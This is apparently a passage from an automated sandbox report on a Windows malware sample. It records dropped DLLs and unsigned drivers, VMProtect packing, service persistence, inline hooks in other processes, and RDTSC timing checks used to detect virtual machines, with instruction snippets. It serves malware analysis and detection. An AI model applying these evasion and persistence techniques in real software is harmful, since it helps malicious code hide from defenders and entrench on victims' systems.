          Source: C:\Users\user\Desktop\1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile written: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\I779AD\DC1FFAF.iniJump to behavior
          Source: 1.exeStatic file information: File size 30373888 > 1048576
          Source: 1.exeStatic PE information: Raw size of .data31 is bigger than: 0x100000 < 0x1ce6600
          Source: 1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: F:\funny\GamePluginCtrl\Release\gamePluginCtrl.pdb<F source: DC1FFAF.exe, 00000002.00000003.2402871996.00000000065FA000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmp, 586030GBC.dll.2.dr, 5B7DOONHA.dll.2.dr
          Source: Binary string: ginCtrl\Release\gamePluginCtrl.pdb source: DC1FFAF.exe, 00000002.00000003.2402987601.0000000006543000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \bin\xkSHWL.pdb source: DC1FFAF.exe, 00000002.00000002.4732870352.00000000112EE000.00000004.00000020.00020000.00000000.sdmp, DE3EC8324.dll.2.dr
          Source: Binary string: \bin\xkSHWL.pdb$ source: DC1FFAF.exe, 00000002.00000002.4732870352.00000000112EE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \DPK.pdb source: DC1FFAF.exe, 00000002.00000002.4770861240.0000000013FCC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: DPK\bin\dlq.pdb source: DC1FFAF.exe, 00000002.00000002.4792617238.000000001451C000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2226812562.000000000651D000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2226175625.0000000006540000.00000004.00000020.00020000.00000000.sdmp, 38902yywx.dll.2.dr
          Source: Binary string: \GamePluginCtrl\Release\gamePluginCtrl.pdb source: DC1FFAF.exe, 00000002.00000002.4696431974.000000000FA82000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: F:\funny\GamePluginCtrl\Release\gamePluginCtrl.pdb source: DC1FFAF.exe, DC1FFAF.exe, 00000002.00000003.2201582484.000000000659B000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2402871996.00000000065FA000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmp, 586030GBC.dll.2.dr, 5B7DOONHA.dll.2.dr
          Source: Binary string: G:\projects\G\tools\emptyDll\Release\emptyDll.pdb @ source: DC1FFAF.exe, 00000002.00000003.2216343997.0000000006540000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2216394508.0000000006520000.00000004.00000020.00020000.00000000.sdmp, 17B0883wr.dll.2.dr, 51D610yws.dll.2.dr, 338Atwspn.dll.2.dr
          Source: Binary string: DPK\bin\DPK.pdb source: DC1FFAF.exe, 00000002.00000002.4749878169.00000000117A4000.00000004.00000020.00020000.00000000.sdmp, 42EEXUWWZ.dll.2.dr, 1F0xyrmp.dll.2.dr
          Source: Binary string: \GamePluginCtrl\Release\gamePluginCtrl.pdb<F source: DC1FFAF.exe, 00000002.00000002.4696431974.000000000FA82000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \bin\xkSHWL.pdbtc source: DE3EC8324.dll.2.dr
          Source: Binary string: DPK\bin\JDClient.pdb source: 7488JGDAA.exe.2.dr
          Source: Binary string: G:\projects\G\tools\emptyDll\Release\emptyDll.pdb source: DC1FFAF.exe, 00000002.00000002.4791297106.00000000144D8000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2216343997.0000000006540000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2216394508.0000000006520000.00000004.00000020.00020000.00000000.sdmp, 17B0883wr.dll.2.dr, 51D610yws.dll.2.dr, 338Atwspn.dll.2.dr

          Data Obfuscation

          barindex
          Sample is protected by VMProtect
          Source: DE840zzuv.dll.2.drStatic PE information: Section: .vmp1 IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: FB97GB461.dll.2.drStatic PE information: Section: .vmp1 IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EA0D20 ReadProcessMemory,LoadLibraryA,GetProcAddress,ReadProcessMemory,FreeLibrary,2_2_69EA0D20
          Source: initial sampleStatic PE information: section where entry point is pointing to: .data31
          Source: 1.exeStatic PE information: section name: .data30
          Source: 1.exeStatic PE information: section name: .data31
          Source: DC1FFAF.exe.0.drStatic PE information: section name: 0DE
          Source: DC1FFAF.exe.0.drStatic PE information: section name: 1TA
          Source: DC1FFAF.exe.0.drStatic PE information: section name: 2S
          Source: DC1FFAF.exe.0.drStatic PE information: section name: 3data
          Source: DC1FFAF.exe.0.drStatic PE information: section name: 4ls
          Source: DC1FFAF.exe.0.drStatic PE information: section name: 5data
          Source: DC1FFAF.exe.0.drStatic PE information: section name: 6eloc
          Source: DC1FFAF.exe.0.drStatic PE information: section name: 7src
          Source: DC1FFAF.exe.0.drStatic PE information: section name: 8ext
          Source: DC1FFAF.exe.0.drStatic PE information: section name: 9data
          Source: DC1FFAF.exe.0.drStatic PE information: section name: 10ta
          Source: 5B7DOONHA.dll.2.drStatic PE information: section name: .vvvt0
          Source: 5B7DOONHA.dll.2.drStatic PE information: section name: .vvvt1
          Source: 42EEXUWWZ.dll.2.drStatic PE information: section name: .vmp0
          Source: BD950wrst.dll.2.drStatic PE information: section name: .vmp0
          Source: 1F0xyrmp.dll.2.drStatic PE information: section name: .vmp0
          Source: 2865ivSJ0.sys.2.drStatic PE information: section name: .vvd0
          Source: 2865ivSJ0.sys.2.drStatic PE information: section name: .vvd1
          Source: C2B2CFEA7.dll.2.drStatic PE information: section name: .vmp0
          Source: DC1FFAF.sys.2.drStatic PE information: section name: .vvd0
          Source: DC1FFAF.sys.2.drStatic PE information: section name: .vvd1
          Source: BC66DPQaf.sys.2.drStatic PE information: section name: .vvd0
          Source: BC66DPQaf.sys.2.drStatic PE information: section name: .vvd1
          Source: A16652yzz.sys.2.drStatic PE information: section name: .vvd0
          Source: A16652yzz.sys.2.drStatic PE information: section name: .vvd1
          Source: DE840zzuv.dll.2.drStatic PE information: section name: .vmp0
          Source: DE840zzuv.dll.2.drStatic PE information: section name: .vmp1
          Source: FB97GB461.dll.2.drStatic PE information: section name: .vmp0
          Source: FB97GB461.dll.2.drStatic PE information: section name: .vmp1
          Source: 7488JGDAA.exe.2.drStatic PE information: section name: .vmp0
          Source: 7488JGDAA.exe.2.drStatic PE information: section name: .vmp1
          Source: 38902yywx.dll.2.drStatic PE information: section name: .vmp0
          Source: 38902yywx.dll.2.drStatic PE information: section name: .vmp1
          Source: A815rppmj.dll.2.drStatic PE information: section name: .didata
          Source: A815rppmj.dll.2.drStatic PE information: section name: .aspack
          Source: A815rppmj.dll.2.drStatic PE information: section name: .adata
          Source: 586030GBC.dll.2.drStatic PE information: section name: .vvvt0
          Source: 586030GBC.dll.2.drStatic PE information: section name: .vvvt1
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EF89DD pushfd ; mov dword ptr [esp], E900EAA7h2_2_69EF89F0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EF89DD push dword ptr [esp+38h]; retn 003Ch2_2_69EF8A14
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EF89B6 pushfd ; mov dword ptr [esp], E900EAA7h2_2_69EF89F0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EF89B6 push dword ptr [esp+38h]; retn 003Ch2_2_69EF8A14
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69F0694C push ebp; mov dword ptr [esp], esi2_2_69F0A2D8
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69F0694C push 25B5A73Ah; mov dword ptr [esp], ebx2_2_69F57607
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EA491A push dword ptr [esp+4Ch]; retn 0050h2_2_69EA4942
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EF88E4 pushfd ; mov dword ptr [esp], E900EAA7h2_2_69EF89F0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EF88E4 push dword ptr [esp+38h]; retn 003Ch2_2_69EF8A14
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EA484E push A0E60E05h; mov dword ptr [esp], ecx2_2_69EA4871
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69F06BA3 push ebp; mov dword ptr [esp], esi2_2_69F0A2D8
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EF8B2F pushfd ; mov dword ptr [esp], edx2_2_69EF8B56
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69F06A5B push dword ptr [esp+34h]; retn 0040h2_2_69F06A81
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69F04DC8 push dword ptr [edi+ebx*2]; iretd 2_2_69F04DBD
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EF8DBA pushfd ; mov dword ptr [esp], ebx2_2_69EF8D8A
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EF8DBA push edx; mov dword ptr [esp], ebp2_2_69EF9C5D
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69F58D66 pushfd ; mov dword ptr [esp], 3EC03ED0h2_2_69F440D0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EF8D71 pushfd ; mov dword ptr [esp], ebx2_2_69EF8D8A
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69F58CF8 push 25B5A73Ah; mov dword ptr [esp], ebx2_2_69F57607
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EF8CFB pushfd ; mov dword ptr [esp], eax2_2_69EF8D09
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EF8C76 push edx; mov dword ptr [esp], ebp2_2_69EF9C5D
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E8AC41 pushfd ; mov dword ptr [esp], edi2_2_69EF956A
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EF8F7F push 6848F6DBh; mov dword ptr [esp], esi2_2_69EF8FA0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EF8F7F push DEDE70D3h; mov dword ptr [esp], edx2_2_69EF8FA8
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E8AFA6 pushfd ; mov dword ptr [esp], edx2_2_69EA4F00
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E8AFA6 push 204BE9FCh; mov dword ptr [esp], eax2_2_69EA4F08
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EA4EF0 pushfd ; mov dword ptr [esp], edx2_2_69EA4F00
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EA4EF0 push 204BE9FCh; mov dword ptr [esp], eax2_2_69EA4F08
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EA4E47 pushad ; mov dword ptr [esp], 4D4E20D4h2_2_69EA4E56
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EA4E20 push 14ADAEA0h; mov dword ptr [esp], EFF82AB3h2_2_69EFFB32
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69F441F2 pushfd ; mov dword ptr [esp], FC1C2701h2_2_69F441FC
          Source: DC1FFAF.exe.0.drStatic PE information: section name: 0DE entropy: 7.9997364104024875
          Source: DC1FFAF.exe.0.drStatic PE information: section name: 1TA entropy: 7.978322038476304
          Source: DC1FFAF.exe.0.drStatic PE information: section name: 3data entropy: 7.935257273389065
          Source: DC1FFAF.exe.0.drStatic PE information: section name: 8ext entropy: 7.900782660215838
          Source: DC1FFAF.exe.0.drStatic PE information: section name: 10ta entropy: 7.973925222571074
          Source: 5B7DOONHA.dll.2.drStatic PE information: section name: .vvvt1 entropy: 7.897791092229113
          Source: 42EEXUWWZ.dll.2.drStatic PE information: section name: .vmp0 entropy: 7.1293297976491194
          Source: BD950wrst.dll.2.drStatic PE information: section name: .vmp0 entropy: 7.933949478599191
          Source: 1F0xyrmp.dll.2.drStatic PE information: section name: .vmp0 entropy: 7.1293297976491194
          Source: 2865ivSJ0.sys.2.drStatic PE information: section name: .vvd1 entropy: 7.873111788795253
          Source: C2B2CFEA7.dll.2.drStatic PE information: section name: .vmp0 entropy: 7.927136044627817
          Source: DC1FFAF.sys.2.drStatic PE information: section name: .vvd1 entropy: 7.865187153145413
          Source: BC66DPQaf.sys.2.drStatic PE information: section name: .vvd1 entropy: 7.865187153145413
          Source: A16652yzz.sys.2.drStatic PE information: section name: .vvd1 entropy: 7.864463910608817
          Source: DE840zzuv.dll.2.drStatic PE information: section name: .vmp1 entropy: 7.957735490987599
          Source: FB97GB461.dll.2.drStatic PE information: section name: .vmp1 entropy: 7.957735490987599
          Source: 7488JGDAA.exe.2.drStatic PE information: section name: .vmp0 entropy: 7.859066289798026
          Source: 7488JGDAA.exe.2.drStatic PE information: section name: .vmp1 entropy: 7.24756237644928
          Source: 38902yywx.dll.2.drStatic PE information: section name: .vmp1 entropy: 7.8581135744322665
          Source: 586030GBC.dll.2.drStatic PE information: section name: .vvvt1 entropy: 7.897791092229113

          Persistence and Installation Behavior

          barindex
          Sample is not signed and drops a device driver
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Windows\SysWOW64\2865ivSJ0.sysJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Windows\DC1FFAF.sysJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Windows\SysWOW64\BC66DPQaf.sysJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Windows\SysWOW64\A16652yzz.sysJump to behavior
          Uses cmd line tools excessively to alter registry or file data
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess created: reg.exe
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess created: reg.exe
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess created: reg.exeJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess created: reg.exeJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\CA229129\42EEXUWWZ.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\CA229129\1F0xyrmp.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Windows\SysWOW64\BC66DPQaf.sysJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Users\user\Desktop\EEC3DA20E\E2416B28\38902yywx.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Users\user\Desktop\EEC3DA20E\CFDEE45078\C2B2CFEA7.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DB37C1B99\BD950wrst.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Users\user\Desktop\EEC3DA20E\B5155CBEC4E\51D610yws.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Windows\SysWOW64\A16652yzz.sysJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\F03D5C\9605A212x.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Windows\DC1FFAF.sysJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\C5639556181\7488JGDAA.exeJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Users\user\Desktop\EEC3DA20E\C1CE322\DE840zzuv.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A9F7A9DD\A815rppmj.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Users\user\Desktop\EEC3DA20E\EC4D54E4D0\338Atwspn.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\E71620\712EVTPSM.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\B671819D97E4\84AEHJG8C.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DC9B0A72\DE3EC8324.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Users\user\Desktop\EEC3DA20E\FFA96FF9\FB97GB461.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A90B6898\5B7DOONHA.dllJump to dropped file
          Source: C:\Users\user\Desktop\1.exeFile created: C:\Program Files (x86)\Java\DC1FFAF.exeJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Windows\SysWOW64\2865ivSJ0.sysJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Users\user\Desktop\EEC3DA20E\CDC745\17B0883wr.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A90B6898\586030GBC.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Windows\SysWOW64\BC66DPQaf.sysJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Windows\SysWOW64\A16652yzz.sysJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Windows\DC1FFAF.sysJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile created: C:\Windows\SysWOW64\2865ivSJ0.sysJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\DC1FFAFJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{32cb138b-8507-4cec-ba14-fc0247804fd4}Jump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E88BE0 OpenSCManagerA,CloseServiceHandle,OpenServiceA,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_69E88BE0

          Hooking and other Techniques for Hiding and Protection

          barindex
          Overwrites code with unconditional jumps - possibly settings hooks in foreign process
          Source: C:\Users\user\Desktop\1.exeMemory written: PID: 3636 base: 774C0005 value: E9 2B BA E8 FF Jump to behavior
          Source: C:\Users\user\Desktop\1.exeMemory written: PID: 3636 base: 7734BA30 value: E9 6B 0E 52 89 Jump to behavior
          Source: C:\Users\user\Desktop\1.exeMemory written: PID: 3636 base: 774C0017 value: E9 7C 8E ED FF Jump to behavior
          Source: C:\Users\user\Desktop\1.exeMemory written: PID: 3636 base: 77398E90 value: E9 9B 3A 4D 89 Jump to behavior
          Source: C:\Users\user\Desktop\1.exeMemory written: PID: 3636 base: 75A50005 value: E9 8B 8A ED FF Jump to behavior
          Source: C:\Users\user\Desktop\1.exeMemory written: PID: 3636 base: 75928A90 value: E9 1B 3D F4 8A Jump to behavior
          Source: C:\Users\user\Desktop\1.exeMemory written: PID: 3636 base: 75A50014 value: E9 1C 02 F0 FF Jump to behavior
          Source: C:\Users\user\Desktop\1.exeMemory written: PID: 3636 base: 75950230 value: E9 0B C6 F1 8A Jump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeMemory written: PID: 420 base: 774C0005 value: E9 2B BA E8 FF Jump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeMemory written: PID: 420 base: 7734BA30 value: E9 6B 0E 21 89 Jump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeMemory written: PID: 420 base: 774C0017 value: E9 7C 8E ED FF Jump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeMemory written: PID: 420 base: 77398E90 value: E9 9B 3A 1C 89 Jump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeMemory written: PID: 420 base: 75A50005 value: E9 8B 8A ED FF Jump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeMemory written: PID: 420 base: 75928A90 value: E9 1B 3D C3 8A Jump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeMemory written: PID: 420 base: 75A50014 value: E9 1C 02 F0 FF Jump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeMemory written: PID: 420 base: 75950230 value: E9 0B C6 C0 8A Jump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EB6E04 IsIconic,GetWindowPlacement,GetWindowRect,2_2_69EB6E04
          Source: C:\Users\user\Desktop\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Contains functionality to detect sleep reduction / modifications
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E9B8D02_2_69E9B8D0
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\1.exeRDTSC instruction interceptor: First address: 7317AF second address: 7317B9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 mov ebx, dword ptr [esp+04h] 0x00000007 cdq 0x00000008 rcl al, cl 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\1.exeRDTSC instruction interceptor: First address: 3F1B5C3 second address: 3F1B5CD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 mov ebx, dword ptr [esp+04h] 0x00000007 cdq 0x00000008 rcl al, cl 0x0000000a rdtsc
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeRDTSC instruction interceptor: First address: 4217AF second address: 4217B9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 mov ebx, dword ptr [esp+04h] 0x00000007 cdq 0x00000008 rcl al, cl 0x0000000a rdtsc
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeRDTSC instruction interceptor: First address: 3C0B5C3 second address: 3C0B5CD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 mov ebx, dword ptr [esp+04h] 0x00000007 cdq 0x00000008 rcl al, cl 0x0000000a rdtsc
